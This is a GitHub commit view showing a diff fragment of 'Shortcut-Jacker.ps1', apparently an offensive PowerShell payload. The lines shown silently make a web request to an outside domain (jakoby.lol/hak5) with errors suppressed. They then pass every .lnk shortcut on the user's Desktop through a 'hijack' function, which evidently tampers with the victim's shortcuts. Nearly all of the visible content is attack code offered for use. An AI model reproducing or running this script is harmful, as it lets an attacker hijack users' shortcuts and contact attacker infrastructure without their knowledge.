Update Shortcut-Jacker.ps1

This commit is contained in:
I-Am-Jakoby 2023-07-21 22:08:57 -05:00 committed by GitHub
parent 7f4899b95e
commit e81518b64e
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -114,5 +114,5 @@ if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconL
}
#-----------------------------------------------------------------------------------------------------------
iwr "https://jakoby.lol/hak5" -EA 0 >$null
Get-ChildItem Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}